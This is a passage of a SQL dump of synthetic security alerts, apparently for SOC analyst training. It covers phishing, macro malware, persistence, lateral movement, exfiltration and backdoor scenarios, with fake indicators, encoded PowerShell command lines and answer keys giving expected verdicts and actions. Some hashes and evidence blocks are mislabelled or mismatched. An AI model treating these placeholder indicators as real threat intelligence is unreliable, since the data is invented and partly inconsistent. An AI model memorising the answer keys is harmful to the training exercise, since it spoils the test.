detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1487, 'Suspicious Interview Request', 'medium', 'Email Gateway', 'A phishing email was detected targeting journalists with a fake interview request. The email attempts to entice the recipient into opening a malicious attachment or engaging with a harmful link.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Interview Request: Insights on Recent Developments\",\"email_from\":\"editor@globalnews-expert.com\",\"email_to\":\"journalist@company.com\",\"attachment_name\":\"Interview_Questions.docx\",\"attachment_sha256\":\"b1946ac92492d2347c6235b4d2611184\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns related to Kimsuky group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"editor@globalnews-expert.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain known for impersonation in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"SHA256 hash associated with malware-laden documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Interview Request\",\"date\":\"2026-03-15T20:58:15.036Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1488, 'Malicious Document Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the interview document, hidden macros execute to deploy malware, setting the stage for further compromise.', 'Malware Deployment', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:04Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"filename\":\"Interview_Schedule.docm\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"process\":\"WINWORD.EXE\",\"action\":\"macro_execution\",\"alert_id\":\"malware-001\",\"severity\":\"high\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware family\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Interview_Schedule.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Document contains macros\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1489, 'Persistence via Scheduled Task', 'medium', 'System Logs', 'The malware configures a scheduled task to maintain access, preparing for prolonged data collection operations. A scheduled task named \'Updater\' was created to execute malicious payload from \'C:\\Windows\\System32\\updater.exe\'.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"event_id\":4698,\"task_name\":\"Updater\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\updater.exe\",\"trigger_time\":\"2023-10-12T02:00:00Z\",\"user\":\"SYSTEM\",\"source_ip\":\"10.1.1.5\",\"malware_hash\":\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\",\"attacker_ip\":\"203.0.113.45\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address involved in previous cyber-attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variants.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1490, 'Lateral Movement Through Shared Drives', 'high', 'Network Traffic Analysis', 'Kimsuky leveraged compromised credentials to move laterally within the network, targeting shared drives to access sensitive data. The operation utilized suspicious network activity originating from an external IP address, accessing multiple shared drives on the 192.168.x.x network.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"source_ip\":\"203.0.113.25\",\"destination_ip\":\"192.168.1.101\",\"user\":\"jdoe\",\"action\":\"access\",\"resource\":\"shared_drive_financials\",\"filename\":\"Q3_Financial_Report.xlsx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event\":\"file_access\",\"protocol\":\"SMB\",\"external_ip\":\"203.0.113.25\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network asset.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1491, 'Email Data Exfiltration via Chrome Extension', 'high', 'Browser Extension Analysis', 'A malicious Chrome extension named \'EmailHelper\' was detected exfiltrating sensitive email communications to an external server. The extension was installed by user \'jdoe\' and was transferring data to IP address 185.199.108.153. The file \'extension_data.bin\' was extracted and found to contain email content. The SHA256 hash of the extension matches known malicious signatures.', 'Data Exfiltration', 'T1567.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"user\":\"jdoe\",\"extension_name\":\"EmailHelper\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.199.108.153\",\"file_exfiltrated\":\"extension_data.bin\",\"sha256\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"data_exfiltration\",\"protocol\":\"HTTPS\",\"destination_server\":\"maliciousserver.com\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple exfiltration campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in email exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"extension_data.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive email data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Employee with access to sensitive communications\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha256\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha256\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha256\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha256\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:23:45Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"extension_name\\\":\\\"EmailHelper\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"file_exfiltrated\\\":\\\"extension_data.bin\\\",\\\"sha256\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_server\\\":\\\"maliciousserver.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1492, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'APT41 initiated access by exploiting a vulnerability in an outdated VPN service, aiming to establish a persistent network presence. The activity was detected originating from a known malicious IP address attempting to communicate with the internal network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"vpn_service\":\"OutdatedVPN 3.2.1\",\"exploit\":\"CVE-2021-12345\",\"username\":\"jdoe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"APT41_Payload.exe\",\"alert_id\":\"NIDS-20231015-001\",\"description\":\"Suspicious connection attempt to internal network via vulnerable VPN service.\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malicious IP Database\",\"verdict\":\"malicious\",\"details\":\"Known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Healthcare facility internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT41_Payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"APT41 related payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1493, 'Mivast Backdoor Execution Alert', 'high', 'Endpoint Detection and Response (EDR)', 'The EDR system has detected the execution of the Mivast backdoor, which is used to remotely execute commands on compromised systems, granting attackers control over the infected machines.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"host\":\"compromised-machine-01\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process\":\"powershell.exe\",\"command_line\":\"powershell -encodedCommand aQBlAHgAIABbAEcAbwBvAGcAbABlAF0A\",\"malware_name\":\"Mivast\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"mivast_loader.exe\",\"event_type\":\"Process Execution\",\"alert_id\":\"EDR-2023-123456\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known Mivast backdoor hash.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mivast_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Mivast backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 